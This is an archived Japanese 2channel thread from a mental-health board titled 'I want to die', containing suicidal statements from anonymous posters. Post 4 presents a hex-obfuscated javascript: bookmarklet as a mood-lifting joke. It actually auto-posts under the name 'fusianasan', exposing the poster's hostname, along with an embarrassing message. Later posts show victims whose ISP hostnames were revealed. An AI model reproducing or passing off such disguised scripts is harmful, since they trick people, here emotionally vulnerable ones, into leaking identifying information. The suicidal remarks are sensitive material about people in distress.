2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

死にたい!

1 :優しい名無しさん:04/10/23 08:05:31 ID:y8Zmdjyi
本気で死にたい奴はこんなところにわざわざ書き込まないだろとか
言う奴がいるけど、死ぬのが怖いだけだ。
苦痛を味あわないで死ねるのならとっくに死んでいる。
もし苦痛を味あわない自殺法があったら年間の自殺者は10万人を超すと思うな。

2 :優しい名無しさん:04/10/23 08:12:44 ID:BgX19Vwq
2げっちゅ

3 :優しい名無しさん:04/10/23 08:18:22 ID:/dLgz4af
苦痛のない自殺があったら、50万人以上は逝きそう
今でも3.5万人くらいだし
鬱の人って3000万人ってテレビで見た。

4 :優しい名無しさん:04/10/23 09:31:26 ID:kZIHapHZ
死ぬ前に、下の事やってみな、くすっと笑えて、ちょっとだけ死ぬ気が遠のくから。

(準備)
2ch専用ブラウザを使用している人は、
IEなどの一般的なブラウザでこのスレを開いておく。

1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b46524
f4d2e76616c75653d2766757369616e6173616e273b4d4553534147452e7661
6c75653d275c75353134345c75386362345c75373533625c75353063665c
75333034665c75333036305c75333035355c7533303434273b7375626d697
42e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+='%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

2、
改行を外して1行にする。

3、
1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。

4、
Enterを押す(もしくは「移動」をクリックする)。

俺はこれをやって思わず笑ってしまったよww

5 :優しい名無しさん:04/10/23 09:58:50 ID:6DAZFuD6
>>4
fusianasanトラップ。要注意。

6 :atfr064005192.do.ppp.infoweb.ne.jp:04/10/23 16:35:07 ID:p06Vt6VW
兄貴画像ください

7 :atfr064005192.do.ppp.infoweb.ne.jp:04/10/23 16:35:54 ID:p06Vt6VW
節穴が怖くて、2chができるか!

普通のエロ画像ください。

8 :優しい名無しさん:04/10/23 16:45:44 ID:+OG9+B7t
こんな板見てるから死にたくなるんだPINKに池

http://www.bbspink.com/

9 :こっち逝ってね:04/10/23 16:50:20 ID:Rsop2vf4
【私】自殺宣言統合スレ 1【死にます】
http://life6.2ch.net/test/read.cgi/mental/1096778376/

10 :Johnny Depp ◆997PLAYBOY :04/10/23 22:37:09 ID:WJndaqLS
イ`

11 :優しい名無しさん:04/10/27 06:40:34 ID:54pMU3Lz
あげ

3 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)